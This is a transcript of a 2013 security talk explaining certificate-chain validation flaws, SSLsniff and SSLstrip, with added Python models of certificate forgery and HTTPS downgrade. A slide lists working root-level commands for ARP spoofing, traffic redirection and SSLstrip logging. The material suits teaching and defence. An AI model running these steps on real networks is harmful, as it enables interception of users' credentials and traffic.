SSLstrip, Stepan Shykerynets, 23.03.2013
TRANSCRIPT
![Page 1: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/1.jpg)
SSLstrip
Stepan Shykerynets
http://wisc.org.ua/ 23.03.2013
![Page 2: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/2.jpg)
![Page 3: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/3.jpg)
![Page 4: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/4.jpg)
![Page 5: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/5.jpg)
!Attention
![Page 6: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/6.jpg)
![Page 7: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/7.jpg)
![Page 8: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/8.jpg)
![Page 9: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/9.jpg)
![Page 10: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/10.jpg)
Private / Public key
Diagram: SERVER (Private key), CLIENT (Public key).
![Page 11: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/11.jpg)
Private / Public key
Diagram: SERVER (Private key), CLIENT (Public key), plus the Public key of the CA.
![Page 12: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/12.jpg)
Private / Public key
Diagram: SERVER (Private key), CLIENT (Public key), CA (Public key).
![Page 13: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/13.jpg)
Private / Public key
Diagram: Message + Public key -> Encrypted message -> Private key -> Message.
![Page 14: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/14.jpg)
SSL And Certificate Chaining
![Page 15: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/15.jpg)
Certificate
• X.509 certificate: version, serial number, issuer, validity, subject, public key
• Signature algorithm
• Signature
![Page 16: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/16.jpg)
Certificate Chaining
• CA Certificate: embedded in the browser. All-powerful. Certifies that a site certificate is authentic.
• Site Certificate: identifies a particular site (URL). Known to be authentic based on the CA Certificate's signature.
![Page 17: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/17.jpg)
Certificate Chaining
• CA Certificate: embedded in the browser. All-powerful. Certifies that a site certificate is authentic.
• Site Certificate: identifies a particular site (URL). Known to be authentic based on the CA Certificate's signature.
• Intermediate CA: not embedded in the browser. Still sort of all-powerful. Certifies that a site certificate is authentic.
![Page 18: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/18.jpg)
Certificate Chaining
VeriSign -> Intermediate CA -> Facebook.com
![Page 19: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/19.jpg)
Certificate Chains Can Be > 3
VeriSign -> Intermediate CA -> Intermediate CA -> Facebook.com
![Page 20: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/20.jpg)
How do we validate these things?
• Verify that the leaf node has the name of the site you're connecting to.
• Verify that the leaf node hasn't expired.
• Check the signature.
• If the signing certificate is in our list of root CAs, stop.
• Otherwise, move one up the chain and repeat.
![Page 21: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/21.jpg)
Very tempting to use a simple recursive function.
Everyone focuses on the signature validation.
The result of a naive attempt at validation is a chain that is complete, but nothing more.
![Page 22: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/22.jpg)
What if …
VeriSign -> Intermediate CA -> Intermediate CA -> hack.org
![Page 23: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/23.jpg)
What if …
VeriSign -> Intermediate CA -> Intermediate CA -> hack.org -> Facebook.com
![Page 24: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/24.jpg)
What they say:
• Verify that the leaf node has the name of the site you're connecting to.
• Verify that the leaf node hasn't expired.
• Check the signature.
• If the signing certificate is in our list of root CAs, stop.
• Otherwise, move one up the chain and repeat.
![Page 25: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/25.jpg)
But …
• All the signatures are valid
• Nothing has expired
• The chain is in fact complete
• The root CA is embedded in the browser and trusted
![Page 26: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/26.jpg)
The missing piece
![Page 27: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/27.jpg)
The missing piece
![Page 28: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/28.jpg)
The missing piece
![Page 29: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/29.jpg)
• Most CAs didn't explicitly set basicConstraints: CA=FALSE on the leaf certificates they issued.
• A lot of web browsers and other SSL implementations didn't bother to check it, whether the field was there or not.
• So anyone with a valid leaf node certificate could create and sign a leaf node certificate for any other domain, and the chain would validate.
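The walk up the chain from the "What they say" slide, and the same walk with the missing basicConstraints check, as an added worked example (my code, not from the slides and not from sslsniff or sslstrip). It models certificates as dicts and signs them with textbook RSA over small fixed Mersenne primes, a toy stand-in for X.509 and real RSA; the names VeriSign, Intermediate CA, hack.org and Facebook.com are the slides' own, while the dates, keys and field names are constructed for the example. Requires Python 3.8+ for the modular inverse via pow().

```python
"""Toy model of the chain validation on the slides: the 'What they say'
algorithm as written, and the same algorithm with the basicConstraints check
that was missing. Certificates are dicts, signatures are textbook RSA over
SHA-256 with small fixed Mersenne primes. Illustration only: not X.509, not
secure, every name and key below is constructed."""
import hashlib
import json

E = 65537  # RSA public exponent


def mersenne(k):
    """2**k - 1, prime for the exponents used here (13, 17, 19, 31, 61, 89, 107, 127)."""
    return (1 << k) - 1


def rsa_key(p, q):
    """Textbook RSA keypair from two known primes (toy, never do this for real)."""
    n = p * q
    return {"n": n, "e": E, "d": pow(E, -1, (p - 1) * (q - 1))}  # Python 3.8+


def digest(tbs, n):
    """SHA-256 of a canonical encoding of the signed fields, reduced mod n."""
    data = json.dumps(tbs, sort_keys=True).encode()
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(key, tbs):
    return pow(digest(tbs, key["n"]), key["d"], key["n"])


def verify(pub, tbs, sig):
    return pow(sig, pub["e"], pub["n"]) == digest(tbs, pub["n"])


def issue(subject, key, ca, not_after, issuer_subject, issuer_key):
    """A certificate: the signed fields (version and serial omitted) plus the
    issuer's signature over them. basicConstraints CA is part of the signed data."""
    tbs = {"subject": subject, "issuer": issuer_subject, "not_after": not_after,
           "public_key": {"n": key["n"], "e": key["e"]},
           "basic_constraints": {"ca": ca}}
    return {"tbs": tbs, "sig": sign(issuer_key, tbs)}


def validate(chain, hostname, today, roots, check_basic_constraints):
    """chain[0] is the leaf, each later entry is the issuer of the one before it;
    roots maps subject name -> trusted root certificate (the browser's store).
    With check_basic_constraints=False this is exactly the 'What they say'
    list; with True, a signer that is not marked CA is rejected."""
    if chain[0]["tbs"]["subject"] != hostname:
        return False                       # leaf must carry the site's name
    for i, cert in enumerate(chain):
        tbs = cert["tbs"]
        if tbs["not_after"] < today:       # ISO dates compare as strings
            return False
        # The signer is the next certificate in the chain, or a trusted root.
        signer = chain[i + 1] if i + 1 < len(chain) else roots.get(tbs["issuer"])
        if signer is None or signer["tbs"]["subject"] != tbs["issuer"]:
            return False
        if not verify(signer["tbs"]["public_key"], tbs, cert["sig"]):
            return False
        if check_basic_constraints and not signer["tbs"]["basic_constraints"]["ca"]:
            return False                   # the missing piece: a leaf may not sign
        if roots.get(signer["tbs"]["subject"]) is signer:
            return True                    # reached an embedded root CA: stop
    return False                           # chain ended without reaching a root


def build_scenario():
    """The slides' picture: VeriSign -> Intermediate CA -> hack.org, then a
    Facebook.com certificate signed with hack.org's leaf key."""
    root_key = rsa_key(mersenne(61), mersenne(89))
    inter_key = rsa_key(mersenne(107), mersenne(127))
    hack_key = rsa_key(mersenne(31), mersenne(19))
    fb_key = rsa_key(mersenne(17), mersenne(13))
    root = issue("VeriSign", root_key, True, "2030-01-01", "VeriSign", root_key)
    inter = issue("Intermediate CA", inter_key, True, "2020-01-01", "VeriSign", root_key)
    hack = issue("hack.org", hack_key, False, "2015-01-01", "Intermediate CA", inter_key)
    fb = issue("Facebook.com", fb_key, False, "2015-01-01", "Intermediate CA", inter_key)
    # The attack: hack.org's perfectly valid leaf certificate signs a leaf for
    # Facebook.com (reusing the attacker's key; any key would do).
    forged = issue("Facebook.com", hack_key, False, "2015-01-01", "hack.org", hack_key)
    roots = {"VeriSign": root}
    return roots, [fb, inter], [forged, hack, inter]


if __name__ == "__main__":
    roots, legit, forged = build_scenario()
    today = "2013-03-23"
    for label, chain in (("legitimate", legit), ("forged via hack.org", forged)):
        print(label, "naive:", validate(chain, "Facebook.com", today, roots, False),
              "with basicConstraints:", validate(chain, "Facebook.com", today, roots, True))
```

The forged chain passes every step the slide lists: the name matches, nothing has expired, every signature verifies, and the walk ends at an embedded root. Only the extra line that asks whether each signer is actually a CA rejects it, and because the CA flag sits inside the signed fields, hack.org cannot simply flip it on its own certificate.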
![Page 30: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/30.jpg)
But we have one problem
![Page 31: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/31.jpg)
Smart browsers
![Page 32: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/32.jpg)
People are …
![Page 33: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/33.jpg)
People are … LAZY
![Page 34: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/34.jpg)
http://... / https://...
![Page 35: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/35.jpg)
SSLsniff
![Page 36: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/36.jpg)
SSLsniff
• Intercept a connection from the client side.
• Generate a certificate for the site it is connecting to.
• Sign it with any random valid leaf node certificate.
• Pass that certificate chain to the client.
• Make a normal SSL connection to the server.
• Pass data between client and server, decrypting and encrypting on each end.
![Page 37: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/37.jpg)
Web browsing
• SSL is almost never encountered directly.
• It is either encountered as a result of:
  A 302 redirect from an HTTP URL to an HTTPS URL.
  An HTTPS link that a user clicks on from an HTTP page.
![Page 38: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/38.jpg)
SSLstrip
• Watch HTTP traffic go by.
• Switch <a href="https://..."> to <a href="http://..."> and keep a map of what you've changed.
• Switch Location: https:// to Location: http:// and keep a map of what you've changed.
![Page 39: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/39.jpg)
SSLstrip
• Watch HTTP traffic go by.
• When we see an HTTP request for a URL that we've stripped, proxy that out as HTTPS to the server.
• Watch the HTTPS traffic go by, log everything that we want, and keep a map of all relative, CSS and JS links that go by.
![Page 40: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/40.jpg)
SSLstrip
• The server never knows the difference. Everything looks secure on their end.
• The client doesn't display any of the disastrous warnings that we want to avoid.
• We see all the traffic.
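The three SSLstrip slides above describe one loop; here it is as an added example in Python (my code, not the sslstrip tool's and not from the slides). The proxy state, the bank.example host, the URLs and the HTTP messages in demo() are all constructed for illustration, and the rewrite covers href, src and action attributes, which goes slightly beyond the <a href> case the slide names:

```python
"""Model of the sslstrip loop on the three SSLstrip slides: downgrade https://
links and Location headers on the way to the client, remember what was
stripped, and fetch the client's later plain-HTTP requests over HTTPS from the
server. The HTTP messages in demo() are constructed, not captured traffic."""
import re
from urllib.parse import urljoin

# href/src/action attribute values; group 1 keeps the attribute prefix intact.
LINK = re.compile(r'((?:href|src|action)=["\'])([^"\']+)', re.IGNORECASE)


class SSLStripModel:
    """State for one victim: which URLs we handed out as http://, and what they posted."""

    def __init__(self):
        self.stripped = set()   # "host/path" entries the client only knows as http://
        self.captured = []      # (host/path, request body) seen on stripped URLs

    @staticmethod
    def _bare(url):
        """'https://host/path' -> 'host/path'."""
        return url.split("://", 1)[1]

    def rewrite_response(self, origin_url, headers, body):
        """Rewrite one server response before relaying it to the client.
        origin_url is where the proxy actually fetched it (http:// or https://)."""
        out = dict(headers)
        loc = out.get("Location", "")
        if loc.lower().startswith("https://"):          # 302 to HTTPS -> plain HTTP
            self.stripped.add(self._bare(loc))
            out["Location"] = "http://" + self._bare(loc)

        def swap(m):
            prefix, target = m.group(1), m.group(2)
            if target.lower().startswith("https://"):   # <a href="https://..."> etc.
                self.stripped.add(self._bare(target))
                return prefix + "http://" + self._bare(target)
            if "://" not in target and origin_url.lower().startswith("https://"):
                # Relative CSS/JS/link on a page we fetched over HTTPS: the browser
                # will request it over plain HTTP, so remember to upgrade it too.
                self.stripped.add(self._bare(urljoin(origin_url, target)))
            return m.group(0)

        return out, LINK.sub(swap, body)

    def upstream_url(self, client_url, body=""):
        """Where the proxy fetches a client request: HTTPS if we stripped that URL."""
        if "://" not in client_url:
            return client_url
        bare = self._bare(client_url)
        if client_url.lower().startswith("http://") and bare in self.stripped:
            if body:
                self.captured.append((bare, body))      # credentials arrive in clear
            return "https://" + bare
        return client_url


def demo():
    """One login flow through the proxy; returns what each side sees."""
    proxy = SSLStripModel()
    # 1. Client asks for http://bank.example/ ; the server redirects to HTTPS.
    hdrs, _ = proxy.rewrite_response("http://bank.example/",
                                     {"Location": "https://bank.example/login"}, "")
    # 2. Client follows the now-plain redirect; the proxy fetches it over HTTPS.
    login_upstream = proxy.upstream_url(hdrs["Location"])
    # 3. The HTTPS login page carries a relative stylesheet and an HTTPS form action.
    page = ('<link href="/static/site.css">'
            '<form action="https://bank.example/auth" method="post">')
    _, page_to_client = proxy.rewrite_response(login_upstream, {}, page)
    # 4. Client submits the form over plain HTTP to the stripped action URL.
    auth_upstream = proxy.upstream_url("http://bank.example/auth",
                                       "user=alice&pass=hunter2")
    return (hdrs["Location"], login_upstream, page_to_client, auth_upstream,
            sorted(proxy.stripped), proxy.captured)


if __name__ == "__main__":
    for item in demo():
        print(item)
```

The two maps on the slides collapse into one set of scheme-less URLs: anything the client was handed as http:// that the proxy knows really lives at https://, including relative assets resolved against the HTTPS page they came from. The whole loop depends on the client being willing to speak plain HTTP to the host at all; a browser that already holds an HSTS policy for bank.example never sends the request in step 2, so the downgrade fails there, and that is the property to look for when assessing a site against this attack.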
![Page 41: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/41.jpg)
Let's simplify it…
![Page 42: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/42.jpg)
Time to action
![Page 43: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/43.jpg)
BackTrack : Giving Machine Guns to Monkeys since 2006
![Page 44: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/44.jpg)
Tools
• SSLstrip
• ARPspoof
• Ettercap
![Page 45: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/45.jpg)
Commands
• # echo 1 > /proc/sys/net/ipv4/ip_forward
• # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
• # sslstrip -a -l 10000 -w log.txt -f
• # arpspoof -i <yourNetworkDevice> -t <yourTarget> <theRoutersIpAddress>
• # ettercap -T -q -i <yourNetworkDevice>
All of these run as root on the BackTrack machine. The port in the iptables REDIRECT rule must be the same port sslstrip listens on with -l, and ip_forward has to be enabled before arpspoof starts, otherwise the victim simply loses connectivity instead of being proxied.
![Page 46: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/46.jpg)
Protection
• Google services
• High protection network equipment
• Checking site certificates (and the scheme in the address bar: after SSLstrip the victim is looking at a plain http:// page, so there is no certificate and no warning to dismiss)